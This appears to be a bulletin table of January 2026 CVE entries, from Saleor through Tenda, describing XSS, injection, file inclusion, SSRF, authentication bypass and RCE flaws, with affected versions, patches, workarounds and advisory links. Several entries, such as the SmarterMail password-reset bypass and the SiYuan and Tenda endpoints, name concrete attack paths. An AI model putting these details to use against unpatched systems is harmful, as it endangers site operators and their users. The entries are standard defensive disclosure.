| saleor--saleor | Saleor is an e-commerce platform. Starting in version 3.0.0 and prior to versions 3.20.108, 3.21.43, and 3.22.27, Saleor was allowing users to modify rich text fields with HTML without running any backend HTML cleaners thus allowing malicious actors to perform stored XSS attacks on dashboards and storefronts. Malicious staff members could craft script injections to target other staff members, possibly stealing their access and/or refresh tokens. This issue has been patched in versions 3.22.27, 3.21.43, and 3.20.108. In case of inability to upgrade straight away, a possible workaround is to use client-side cleaner. | 2026-01-21 | not yet calculated | CVE-2026-22849 | https://github.com/saleor/saleor/security/advisories/GHSA-8jcj-r5g2-qrpv https://github.com/saleor/saleor/commit/1085c7813224a0a65f1dac7275cbc3244e23c386 https://github.com/saleor/saleor/commit/676d95dbc7d811610e68f2ea8f9b6652cbd58e9b https://github.com/saleor/saleor/commit/9110eba68c3f73afa1f72b45bd9b1394c752d335 https://github.com/saleor/saleor/commit/b67a0b9d9f243e5d6c2f9c7643d42a54c24c90ee https://github.com/saleor/saleor/commit/bb5f883aeb0f085899a9d4f35d429cf7eb07a11d https://docs.saleor.io/security/#editorjs--html-cleaning |
| saleor--saleor | Saleor is an e-commerce platform. Starting in version 3.0.0 and prior to versions 3.20.108, 3.21.43, and 3.22.27, Saleor allowed authenticated staff users or Apps to upload arbitrary files, including malicious HTML and SVG files containing Javascript. Depending on the deployment strategy, these files may be served from the same domain as the dashboard without any restrictions leading to the execution of malicious scripts in the context of the user's browser. Malicious staff members could craft script injections to target other staff members, possibly stealing their access and/or refresh tokens. Users are vulnerable if they host the media files inside the same domain as the dashboard, e.g., dashboard is at `example.com/dashboard/` and media are under `example.com/media/`. They are not impact if media files are hosted in a different domain, e.g., `media.example.com`. Users are impacted if they do not return a `Content-Disposition: attachment` header for the media files. Saleor Cloud users are not impacted. This issue has been patched in versions: 3.22.27, 3.21.43, and 3.20.108. Some workarounds are available for those unable to upgrade. Configure the servers hosting the media files (e.g., CDN or reverse proxy) to return the Content-Disposition: attachment header. This instructs browsers to download the file instead of rendering them in the browser. Prevent the servers from returning HTML and SVG files. Set-up a `Content-Security-Policy` for media files, such as `Content-Security-Policy: default-src 'none'; base-uri 'none'; frame-ancestors 'none'; form-action 'none';`. | 2026-01-21 | not yet calculated | CVE-2026-23499 | https://github.com/saleor/saleor/security/advisories/GHSA-666h-2p49-pg95 https://github.com/saleor/saleor/commit/77f7927a0db9a216440df92c51012136f13e1d99 https://github.com/saleor/saleor/commit/7d33efc7a06252320cd51cbb20c2e308aed2fd10 https://github.com/saleor/saleor/commit/9110eba68c3f73afa1f72b45bd9b1394c752d335 https://github.com/saleor/saleor/commit/ac6936a336289c77398ef600cad3498ad4ba261c https://github.com/saleor/saleor/commit/b3cb27b3fe96dae3c879063e56d32a9398eabd24 https://docs.saleor.io/security/#restricted-file-uploads |
| saleor--saleor | Saleor is an e-commerce platform. Versions 3.2.0 through 3.20.109, 3.21.0-a.0 through 3.21.44 and 3.22.0-a.0 through 3.22.28 have a n Insecure Direct Object Reference (IDOR) vulnerability that allows unauthenticated actors to extract sensitive information in plain text. Orders created before Saleor 3.2.0 could have PIIs exfiltrated. The issue has been patched in Saleor versions: 3.22.29, 3.21.45, and 3.20.110. To workaround, temporarily block non-staff users from fetching order information (the order() GraphQL query) using a WAF. | 2026-01-23 | not yet calculated | CVE-2026-24136 | https://github.com/saleor/saleor/security/advisories/GHSA-r6fj-f4r9-36gr https://github.com/saleor/saleor/commit/5dab1857fbb2801f74e2bfe86f307e4590d9d2fa https://github.com/saleor/saleor/commit/718ce1b4fc3aef68eeac1aea0cf1d70a614ba6af https://github.com/saleor/saleor/commit/9bcd4f9000b189297eeb3ac88cc28c6c30229153 https://github.com/saleor/saleor/commit/aeaced8acb5e01055eddec584263f77e517d5944 |
| Salesforce--Marketing Cloud Engagement | Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability in Salesforce Marketing Cloud Engagement (MicrositeUrl module) allows Web Services Protocol Manipulation. This issue affects Marketing Cloud Engagement: before January 21st, 2026. | 2026-01-24 | not yet calculated | CVE-2026-22582 | https://help.salesforce.com/s/articleView?id=005299346&type=1 |
| Salesforce--Marketing Cloud Engagement | Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability in Salesforce Marketing Cloud Engagement (CloudPagesUrl module) allows Web Services Protocol Manipulation. This issue affects Marketing Cloud Engagement: before January 21st, 2026. | 2026-01-24 | not yet calculated | CVE-2026-22583 | https://help.salesforce.com/s/articleView?id=005299346&type=1 |
| Salesforce--Marketing Cloud Engagement | Use of a Broken or Risky Cryptographic Algorithm vulnerability in Salesforce Marketing Cloud Engagement (CloudPages, Forward to a Friend, Profile Center, Subscription Center, Unsub Center, View As Webpage modules) allows Web Services Protocol Manipulation. This issue affects Marketing Cloud Engagement: before January 21st, 2026. | 2026-01-24 | not yet calculated | CVE-2026-22585 | https://help.salesforce.com/s/articleView?id=005299346&type=1 |
| Salesforce--Marketing Cloud Engagement | Hard-coded Cryptographic Key vulnerability in Salesforce Marketing Cloud Engagement (CloudPages, Forward to a Friend, Profile Center, Subscription Center, Unsub Center, View As Webpage modules) allows Web Services Protocol Manipulation. This issue affects Marketing Cloud Engagement: before January 21st, 2026. | 2026-01-24 | not yet calculated | CVE-2026-22586 | https://help.salesforce.com/s/articleView?id=005299346&type=1 |
| Scalenut--Scalenut | Missing Authorization vulnerability in Scalenut Scalenut scalenut allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Scalenut: from n/a through <= 1.1.3. | 2026-01-22 | not yet calculated | CVE-2025-68882 | https://patchstack.com/database/Wordpress/Plugin/scalenut/vulnerability/wordpress-scalenut-plugin-1-1-3-broken-access-control-vulnerability?_s_id=cve |
| scriptsbundle--AdForest | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in scriptsbundle AdForest adforest allows PHP Local File Inclusion. This issue affects AdForest: from n/a through <= 6.0.11. | 2026-01-22 | not yet calculated | CVE-2025-67946 | https://patchstack.com/database/Wordpress/Theme/adforest/vulnerability/wordpress-adforest-theme-6-0-11-local-file-inclusion-vulnerability?_s_id=cve |
| scriptsbundle--AdForest Elementor | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in scriptsbundle AdForest Elementor adforest-elementor allows Reflected XSS. This issue affects AdForest Elementor: from n/a through <= 3.0.11. | 2026-01-22 | not yet calculated | CVE-2025-67947 | https://patchstack.com/database/Wordpress/Plugin/adforest-elementor/vulnerability/wordpress-adforest-elementor-plugin-3-0-11-cross-site-scripting-xss-vulnerability?_s_id=cve |
| scriptsbundle--CarSpot | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in scriptsbundle CarSpot carspot allows Reflected XSS. This issue affects CarSpot: from n/a through < 2.4.6. | 2026-01-22 | not yet calculated | CVE-2025-69317 | https://patchstack.com/database/Wordpress/Theme/carspot/vulnerability/wordpress-carspot-theme-2-4-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| SeaTheme--BM Content Builder | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in SeaTheme BM Content Builder bm-builder allows Path Traversal. This issue affects BM Content Builder: from n/a through <= 3.16.3. | 2026-01-22 | not yet calculated | CVE-2025-69055 | https://patchstack.com/database/Wordpress/Plugin/bm-builder/vulnerability/wordpress-bm-content-builder-plugin-3-16-3-arbitrary-file-download-vulnerability?_s_id=cve |
| Select-Themes--Don Peppe | Missing Authorization vulnerability in Select-Themes Don Peppe donpeppe allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Don Peppe: from n/a through <= 1.3. | 2026-01-22 | not yet calculated | CVE-2026-22450 | https://patchstack.com/database/Wordpress/Theme/donpeppe/vulnerability/wordpress-don-peppe-theme-1-3-broken-access-control-vulnerability?_s_id=cve |
| Select-Themes--Prowess | Missing Authorization vulnerability in Select-Themes Prowess prowess allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Prowess: from n/a through <= 1.8.1. | 2026-01-22 | not yet calculated | CVE-2026-22447 | https://patchstack.com/database/Wordpress/Theme/prowess/vulnerability/wordpress-prowess-theme-1-8-1-broken-access-control-vulnerability?_s_id=cve |
| Select-Themes--Prowess | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Select-Themes Prowess prowess allows PHP Local File Inclusion. This issue affects Prowess: from n/a through <= 2.3. | 2026-01-23 | not yet calculated | CVE-2026-24531 | https://patchstack.com/database/Wordpress/Theme/prowess/vulnerability/wordpress-prowess-theme-2-3-local-file-inclusion-vulnerability?_s_id=cve |
| SEOSEON EUROPE S.L--Affiliate Link Tracker | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SEOSEON EUROPE S.L Affiliate Link Tracker affiliate-link-tracker allows Stored XSS. This issue affects Affiliate Link Tracker: from n/a through <= 0.2. | 2026-01-22 | not yet calculated | CVE-2025-62077 | https://patchstack.com/database/Wordpress/Plugin/affiliate-link-tracker/vulnerability/wordpress-affiliate-link-tracker-plugin-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Sergiy Dzysyak--Suggestion Toolkit | Missing Authorization vulnerability in Sergiy Dzysyak Suggestion Toolkit suggestion-toolkit allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Suggestion Toolkit: from n/a through <= 5.0. | 2026-01-23 | not yet calculated | CVE-2026-24622 | https://patchstack.com/database/Wordpress/Plugin/suggestion-toolkit/vulnerability/wordpress-suggestion-toolkit-plugin-5-0-broken-access-control-vulnerability?_s_id=cve |
| SESAME LABS, S.L--Sesame | Stored Cross-Site Scripting (XSS) vulnerability in Sesame web application, due to the fact that uploaded SVG images are not properly sanitized. This allows attackers to embed malicious scripts in SVG files by sending a POST request using the 'logo' parameter in '/api/v3/companies/<ID>/logo', which are then stored on the server and executed in the context of any user who accesses the compromised resource. | 2026-01-20 | not yet calculated | CVE-2025-41084 | https://www.incibe.es/en/incibe-cert/notices/aviso/stored-cross-site-scripting-xss-sesame-web-application |
| Shahjahan Jewel--FluentForm | Improper Control of Generation of Code ('Code Injection') vulnerability in Shahjahan Jewel FluentForm fluentform allows Code Injection. This issue affects FluentForm: from n/a through <= 6.1.11. | 2026-01-22 | not yet calculated | CVE-2025-69001 | https://patchstack.com/database/Wordpress/Plugin/fluentform/vulnerability/wordpress-fluentform-plugin-6-1-11-arbitrary-shortcode-execution-vulnerability?_s_id=cve |
| sheepfish--WebP Conversion | Missing Authorization vulnerability in sheepfish WebP Conversion webp-conversion allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WebP Conversion: from n/a through <= 2.1. | 2026-01-23 | not yet calculated | CVE-2026-24530 | https://patchstack.com/database/Wordpress/Plugin/webp-conversion/vulnerability/wordpress-webp-conversion-plugin-2-1-broken-access-control-vulnerability?_s_id=cve |
| shinetheme--Traveler | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in shinetheme Traveler traveler allows Blind SQL Injection. This issue affects Traveler: from n/a through < 3.2.8. | 2026-01-22 | not yet calculated | CVE-2026-24367 | https://patchstack.com/database/Wordpress/Theme/traveler/vulnerability/wordpress-traveler-theme-3-2-8-sql-injection-vulnerability?_s_id=cve |
| shoutoutglobal--ShoutOut | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in shoutoutglobal ShoutOut shoutout allows Reflected XSS. This issue affects ShoutOut: from n/a through <= 4.0.2. | 2026-01-22 | not yet calculated | CVE-2025-68894 | https://patchstack.com/database/Wordpress/Plugin/shoutout/vulnerability/wordpress-shoutout-plugin-4-0-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| SiteLock--SiteLock Security | Missing Authorization vulnerability in SiteLock SiteLock Security sitelock allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects SiteLock Security: from n/a through <= 5.0.2. | 2026-01-23 | not yet calculated | CVE-2026-24532 | https://patchstack.com/database/Wordpress/Plugin/sitelock/vulnerability/wordpress-sitelock-security-plugin-5-0-2-broken-access-control-vulnerability?_s_id=cve |
| siyuan-note--siyuan | SiYuan is a personal knowledge management system. Versions prior to 3.5.4 are vulnerable to reflected cross-site scripting in /api/icon/getDynamicIcon due to unsanitized SVG input. The endpoint generates SVG images for text icons (type=8). The content query parameter is inserted directly into the SVG <text> tag without XML escaping. Since the response Content-Type is image/svg+xml, injecting unescaped tags allows breaking the XML structure and executing JavaScript. Version 3.5.4 patches the issue.] | 2026-01-19 | not yet calculated | CVE-2026-23847 | https://github.com/siyuan-note/siyuan/security/advisories/GHSA-w836-5gpm-7r93 https://github.com/siyuan-note/siyuan/issues/16844 https://github.com/siyuan-note/siyuan/commit/5c0cc375b47567e15edd2119066b09bb0aa18777 |
| siyuan-note--siyuan | SiYuan is a personal knowledge management system. In versions prior to 3.5.4, the markdown feature allows unrestricted server side html-rendering which allows arbitrary file read (LFD). Version 3.5.4 fixes the issue. | 2026-01-19 | not yet calculated | CVE-2026-23850 | https://github.com/siyuan-note/siyuan/security/advisories/GHSA-cv54-7wv7-qxcw https://github.com/siyuan-note/siyuan/issues/16860 https://github.com/siyuan-note/siyuan/commit/b2274baba2e11c8cf8901b0c5c871e5b27f1f6dd https://github.com/siyuan-note/siyuan/commit/f8f4b517077b92c90c0d7b51ac11be1b34b273ad https://github.com/siyuan-note/siyuan/blob/master/kernel/model/file.go#L1035 https://github.com/siyuan-note/siyuan/blob/v3.4.2/kernel/api/filetree.go#L799-L886 |
| siyuan-note--siyuan | SiYuan is a personal knowledge management system. Versions prior to 3.5.4 contain a logic vulnerability in the /api/file/globalCopyFiles endpoint. The function allows authenticated users to copy files from any location on the server's filesystem into the application's workspace without proper path validation. The vulnerability exists in the api/file.go source code. The function globalCopyFiles accepts a list of source paths (srcs) from the JSON request body. While the code checks if the source file exists using filelock.IsExist(src), it fails to validate whether the source path resides within the authorized workspace directory. Version 3.5.4 patches the issue. | 2026-01-19 | not yet calculated | CVE-2026-23851 | https://github.com/siyuan-note/siyuan/security/advisories/GHSA-94c7-g2fj-7682 https://github.com/siyuan-note/siyuan/issues/16860 https://github.com/siyuan-note/siyuan/commit/b2274baba2e11c8cf8901b0c5c871e5b27f1f6dd https://github.com/siyuan-note/siyuan/commit/f8f4b517077b92c90c0d7b51ac11be1b34b273ad |
| siyuan-note--siyuan | SiYuan is a personal knowledge management system. Versions prior to 3.5.4 have a stored Cross-Site Scripting (XSS) vulnerability that allows an attacker to inject arbitrary HTML attributes into the `icon` attribute of a block via the `/api/attr/setBlockAttrs` API. The payload is later rendered in the dynamic icon feature in an unsanitized context, leading to stored XSS and, in the desktop environment, potential remote code execution (RCE). This issue bypasses the previous fix for issue `#15970` (XSS → RCE via dynamic icons). Version 3.5.4 contains an updated fix. | 2026-01-19 | not yet calculated | CVE-2026-23852 | https://github.com/siyuan-note/siyuan/security/advisories/GHSA-7c6g-g2hx-23vv https://github.com/siyuan-note/siyuan/commit/0be7e1d4e0da9aac0da850b7aeb9b50ede7e5bdb |
| sizam--REHub Framework | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in sizam REHub Framework rehub-framework allows Retrieve Embedded Sensitive Data. This issue affects REHub Framework: from n/a through < 19.9.9.4. | 2026-01-22 | not yet calculated | CVE-2025-63051 | https://patchstack.com/database/Wordpress/Plugin/rehub-framework/vulnerability/wordpress-rehub-framework-plugin-19-9-9-sensitive-data-exposure-vulnerability?_s_id=cve |
| SmartDataSoft--Electrician - Electrical Service WordPress | Server-Side Request Forgery (SSRF) vulnerability in SmartDataSoft Electrician - Electrical Service WordPress electrician allows Server Side Request Forgery. This issue affects Electrician - Electrical Service WordPress: from n/a through <= 5.6. | 2026-01-22 | not yet calculated | CVE-2026-22358 | https://patchstack.com/database/Wordpress/Theme/electrician/vulnerability/wordpress-electrician-electrical-service-wordpress-theme-5-6-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| SmartDataSoft--Pool Services | Server-Side Request Forgery (SSRF) vulnerability in SmartDataSoft Pool Services pool-services allows Server Side Request Forgery. This issue affects Pool Services: from n/a through <= 3.3. | 2026-01-22 | not yet calculated | CVE-2025-62741 | https://patchstack.com/database/Wordpress/Theme/pool-services/vulnerability/wordpress-pool-services-theme-3-3-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| SmarterTools--SmarterMail | SmarterTools SmarterMail versions prior to build 9511 contain an authentication bypass vulnerability in the password reset API. The force-reset-password endpoint permits anonymous requests and fails to verify the existing password or a reset token when resetting system administrator accounts. An unauthenticated attacker can supply a target administrator username and a new password to reset the account, resulting in full administrative compromise of the SmarterMail instance. NOTE: SmarterMail system administrator privileges grant the ability to execute operating system commands via built-in management functionality, effectively providing administrative (SYSTEM or root) access on the underlying host. | 2026-01-22 | not yet calculated | CVE-2026-23760 | https://www.smartertools.com/smartermail/release-notes/current https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/ https://code-white.com/public-vulnerability-list/#authenticationserviceforceresetpassword-missing-authentication-in-smartermail https://www.vulncheck.com/advisories/smartertools-smartermail-authentication-bypass-via-password-reset-api |
| SmarterTools--SmarterMail | SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated remote code execution vulnerability in the ConnectToHub API method. The attacker could point the SmarterMail to the malicious HTTP server, which serves the malicious OS command. This command will be executed by the vulnerable application. | 2026-01-23 | not yet calculated | CVE-2026-24423 | https://www.smartertools.com/smartermail/release-notes/current https://code-white.com/public-vulnerability-list/#systemadminsettingscontrollerconnecttohub-missing-authentication-in-smartermail https://www.vulncheck.com/advisories/smartertools-smartermail-unauthenticated-rce-via-connecttohub-api |
| Softwebmedia--Gyan Elements | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Softwebmedia Gyan Elements gyan-elements allows PHP Local File Inclusion. This issue affects Gyan Elements: from n/a through <= 2.2.1. | 2026-01-22 | not yet calculated | CVE-2026-23978 | https://patchstack.com/database/Wordpress/Plugin/gyan-elements/vulnerability/wordpress-gyan-elements-plugin-2-2-1-local-file-inclusion-vulnerability?_s_id=cve |
| solacewp--Solace | Missing Authorization vulnerability in solacewp Solace solace allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Solace: from n/a through <= 2.1.16. | 2026-01-22 | not yet calculated | CVE-2025-68911 | https://patchstack.com/database/Wordpress/Theme/solace/vulnerability/wordpress-solace-theme-2-1-16-broken-access-control-vulnerability?_s_id=cve |
| Sourcecodester--Sourcecodester | A Remote Code Execution (RCE) vulnerability exists in Sourcecodester Modern Image Gallery App v1.0 within the gallery/upload.php component. The application fails to properly validate uploaded file contents. Additionally, the application preserves the user-supplied file extension during the save process. This allows an unauthenticated attacker to upload arbitrary PHP code by spoofing the MIME type as an image, leading to full system compromise. | 2026-01-23 | not yet calculated | CVE-2025-70457 | https://www.sourcecodester.com/php/18572/modern-image-gallery-app-using-php-and-mysql-source-code.html https://github.com/ismaildawoodjee/vulnerability-research/security/advisories/GHSA-8xq6-hjhw-4983 |
| Sourcecodester--Sourcecodester | A DOM-based Cross-Site Scripting (XSS) vulnerability exists in the DomainCheckerApp class within domain/script.js of Sourcecodester Domain Availability Checker v1.0. The vulnerability occurs because the application improperly handles user-supplied data in the createResultElement method by using the unsafe innerHTML property to render domain search results. | 2026-01-23 | not yet calculated | CVE-2025-70458 | https://www.sourcecodester.com/php/18500/domain-availability-checker-using-php-and-javascript-source-code.html https://github.com/ismaildawoodjee/vulnerability-research/security/advisories/GHSA-chm7-vgf7-6f9p |
| SpringBlade--SpringBlade | Incorrect access control in the authRoutes function of SpringBlade v4.5.0 allows attackers with low-level privileges to escalate privileges. | 2026-01-23 | not yet calculated | CVE-2025-70983 | https://github.com/chillzhuang/SpringBlade https://github.com/chillzhuang/SpringBlade/issues/35 https://gist.github.com/old6ma/9c4d2ba32cd8f562cb80796538157912 |
| Steve Truman--Email Inquiry & Cart Options for WooCommerce | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Steve Truman Email Inquiry & Cart Options for WooCommerce woocommerce-email-inquiry-cart-options allows DOM-Based XSS. This issue affects Email Inquiry & Cart Options for WooCommerce: from n/a through <= 3.4.3. | 2026-01-23 | not yet calculated | CVE-2026-24526 | https://patchstack.com/database/Wordpress/Plugin/woocommerce-email-inquiry-cart-options/vulnerability/wordpress-email-inquiry-cart-options-for-woocommerce-plugin-3-4-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| storeapps--Stock Manager for WooCommerce | Cross-Site Request Forgery (CSRF) vulnerability in storeapps Stock Manager for WooCommerce woocommerce-stock-manager allows Cross Site Request Forgery. This issue affects Stock Manager for WooCommerce: from n/a through < 3.6.0. | 2026-01-22 | not yet calculated | CVE-2026-24365 | https://patchstack.com/database/Wordpress/Plugin/woocommerce-stock-manager/vulnerability/wordpress-stock-manager-for-woocommerce-plugin-3-6-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Strategy11 Team--AWP Classifieds | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Strategy11 Team AWP Classifieds another-wordpress-classifieds-plugin allows Retrieve Embedded Sensitive Data. This issue affects AWP Classifieds: from n/a through <= 4.4.3. | 2026-01-23 | not yet calculated | CVE-2026-24593 | https://patchstack.com/database/Wordpress/Plugin/another-wordpress-classifieds-plugin/vulnerability/wordpress-awp-classifieds-plugin-4-4-3-sensitive-data-exposure-vulnerability?_s_id=cve |
| strongholdthemes--Dental Care CPT | Deserialization of Untrusted Data vulnerability in strongholdthemes Dental Care CPT dentalcare-cpt allows Object Injection. This issue affects Dental Care CPT: from n/a through <= 20.2. | 2026-01-22 | not yet calculated | CVE-2025-69035 | https://patchstack.com/database/Wordpress/Plugin/dentalcare-cpt/vulnerability/wordpress-dental-care-cpt-plugin-20-2-php-object-injection-vulnerability?_s_id=cve |
| strongholdthemes--Tech Life CPT | Deserialization of Untrusted Data vulnerability in strongholdthemes Tech Life CPT techlife-cpt allows Object Injection. This issue affects Tech Life CPT: from n/a through <= 16.4. | 2026-01-22 | not yet calculated | CVE-2025-69036 | https://patchstack.com/database/Wordpress/Plugin/techlife-cpt/vulnerability/wordpress-tech-life-cpt-plugin-16-4-php-object-injection-vulnerability?_s_id=cve |
| subhansanjaya--Carousel Horizontal Posts Content Slider | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in subhansanjaya Carousel Horizontal Posts Content Slider carousel-horizontal-posts-content-slider allows DOM-Based XSS. This issue affects Carousel Horizontal Posts Content Slider: from n/a through <= 3.3.2. | 2026-01-22 | not yet calculated | CVE-2026-22347 | https://patchstack.com/database/Wordpress/Plugin/carousel-horizontal-posts-content-slider/vulnerability/wordpress-carousel-horizontal-posts-content-slider-plugin-3-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Sully--Media Library File Size | Missing Authorization vulnerability in Sully Media Library File Size media-library-file-size allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Media Library File Size: from n/a through <= 1.6.7. | 2026-01-23 | not yet calculated | CVE-2026-24569 | https://patchstack.com/database/Wordpress/Plugin/media-library-file-size/vulnerability/wordpress-media-library-file-size-plugin-1-6-7-broken-access-control-vulnerability?_s_id=cve |
| sumup--SumUp Payment Gateway For WooCommerce | Missing Authorization vulnerability in sumup SumUp Payment Gateway For WooCommerce sumup-payment-gateway-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects SumUp Payment Gateway For WooCommerce: from n/a through <= 2.7.9. | 2026-01-23 | not yet calculated | CVE-2026-24583 | https://patchstack.com/database/Wordpress/Plugin/sumup-payment-gateway-for-woocommerce/vulnerability/wordpress-sumup-payment-gateway-for-woocommerce-plugin-2-7-9-broken-access-control-vulnerability?_s_id=cve |
| swingmx--swingmusic | Swing Music is a self-hosted music player for local audio files. Prior to version 2.1.4, Swing Music's `list_folders()` function in the `/folder/dir-browser` endpoint is vulnerable to directory traversal attacks. Any authenticated user (including non-admin) can browse arbitrary directories on the server filesystem. Version 2.1.4 fixes the issue. | 2026-01-19 | not yet calculated | CVE-2026-23877 | https://github.com/swingmx/swingmusic/security/advisories/GHSA-pj88-9xww-gxmh https://github.com/swingmx/swingmusic/commit/9a915ca62af1502b9550722df82f5d432cb73de3 |
| Syed Balkhi--Sugar Calendar (Lite) | Missing Authorization vulnerability in Syed Balkhi Sugar Calendar (Lite) sugar-calendar-lite allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Sugar Calendar (Lite): from n/a through <= 3.10.1. | 2026-01-23 | not yet calculated | CVE-2026-24636 | https://patchstack.com/database/Wordpress/Plugin/sugar-calendar-lite/vulnerability/wordpress-sugar-calendar-lite-plugin-3-10-1-broken-access-control-vulnerability?_s_id=cve |
| tabbyai--Tabby Checkout | Insertion of Sensitive Information Into Sent Data vulnerability in tabbyai Tabby Checkout tabby-checkout allows Retrieve Embedded Sensitive Data. This issue affects Tabby Checkout: from n/a through <= 5.8.4. | 2026-01-22 | not yet calculated | CVE-2025-68035 | https://patchstack.com/database/Wordpress/Plugin/tabby-checkout/vulnerability/wordpress-tabby-checkout-plugin-5-8-4-sensitive-data-exposure-vulnerability?_s_id=cve |
| tagDiv--tagDiv Composer | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in tagDiv tagDiv Composer td-composer allows DOM-Based XSS. This issue affects tagDiv Composer: from n/a through <= 5.4.2. | 2026-01-22 | not yet calculated | CVE-2025-50005 | https://patchstack.com/database/Wordpress/Plugin/td-composer/vulnerability/wordpress-tagdiv-composer-plugin-5-4-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| TangibleWP--Listivo Core | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in TangibleWP Listivo Core listivo-core allows PHP Local File Inclusion. This issue affects Listivo Core: from n/a through <= 2.3.77. | 2026-01-22 | not yet calculated | CVE-2025-67957 | https://patchstack.com/database/Wordpress/Plugin/listivo-core/vulnerability/wordpress-listivo-core-plugin-2-3-77-local-file-inclusion-vulnerability?_s_id=cve |
| TangibleWP--MyHome Core | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in TangibleWP MyHome Core myhome-core allows PHP Local File Inclusion. This issue affects MyHome Core: from n/a through <= 4.1.0. | 2026-01-22 | not yet calculated | CVE-2025-67955 | https://patchstack.com/database/Wordpress/Plugin/myhome-core/vulnerability/wordpress-myhome-core-plugin-4-1-0-local-file-inclusion-vulnerability?_s_id=cve |
| Tasos Fel--Civic Cookie Control | Missing Authorization vulnerability in Tasos Fel Civic Cookie Control civic-cookie-control-8 allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Civic Cookie Control: from n/a through <= 1.53. | 2026-01-22 | not yet calculated | CVE-2026-22348 | https://patchstack.com/database/Wordpress/Plugin/civic-cookie-control-8/vulnerability/wordpress-civic-cookie-control-plugin-1-53-broken-access-control-vulnerability?_s_id=cve |
| Taxcloud--TaxCloud for WooCommerce | Missing Authorization vulnerability in Taxcloud TaxCloud for WooCommerce simple-sales-tax allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects TaxCloud for WooCommerce: from n/a through <= 8.3.8. | 2026-01-22 | not yet calculated | CVE-2025-67958 | https://patchstack.com/database/Wordpress/Plugin/simple-sales-tax/vulnerability/wordpress-taxcloud-for-woocommerce-plugin-8-3-8-broken-access-control-vulnerability?_s_id=cve |
| temash--Barberry | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in temash Barberry barberry allows PHP Local File Inclusion. This issue affects Barberry: from n/a through <= 2.9.9.87. | 2026-01-22 | not yet calculated | CVE-2025-68908 | https://patchstack.com/database/Wordpress/Theme/barberry/vulnerability/wordpress-barberry-theme-2-9-9-87-local-file-inclusion-vulnerability?_s_id=cve |
| Tenda--Tenda | Tenda AX3 firmware v16.03.12.11 contains a stack overflow in formSetIptv via the list parameter, which can cause memory corruption and enable remote code execution. | 2026-01-21 | not yet calculated | CVE-2025-69762 | https://river-brow-763.notion.site/Tenda-AX3-Buffer-Overflow-in-formSetIptv-2c9a595a7aef80718ff2c3869d32392d?pvs=74 https://river-brow-763.notion.site/Tenda-AX3-Buffer-Overflow-in-formSetIptv-2c9a595a7aef80718ff2c3869d32392d |
| Tenda--Tenda | Tenda AX3 firmware v16.03.12.11 contains a stack overflow in formSetIptv via the vlanId parameter, which can cause memory corruption and enable remote code execution. | 2026-01-21 | not yet calculated | CVE-2025-69763 | https://river-brow-763.notion.site/Tenda-AX3-Buffer-Overflow-in-formSetIptv-2c9a595a7aef8025a3c6c4b102d95dd4?source=copy_link https://river-brow-763.notion.site/Tenda-AX3-Buffer-Overflow-in-formSetIptv-2c9a595a7aef8025a3c6c4b102d95dd4 |
| Tenda--Tenda | Tenda AX3 firmware v16.03.12.11 contains a stack-based buffer overflow in the formGetIptv function due to improper handling of the stbpvid stack buffer, which may result in memory corruption and remote code execution. | 2026-01-22 | not yet calculated | CVE-2025-69764 | https://river-brow-763.notion.site/Tenda-AX3-Buffer-Overflow-in-formGetIptv-2c9a595a7aef80e9b90fdaa56f51374b?source=copy_link https://river-brow-763.notion.site/Tenda-AX3-Buffer-Overflow-in-formGetIptv-2c9a595a7aef80e9b90fdaa56f51374b |
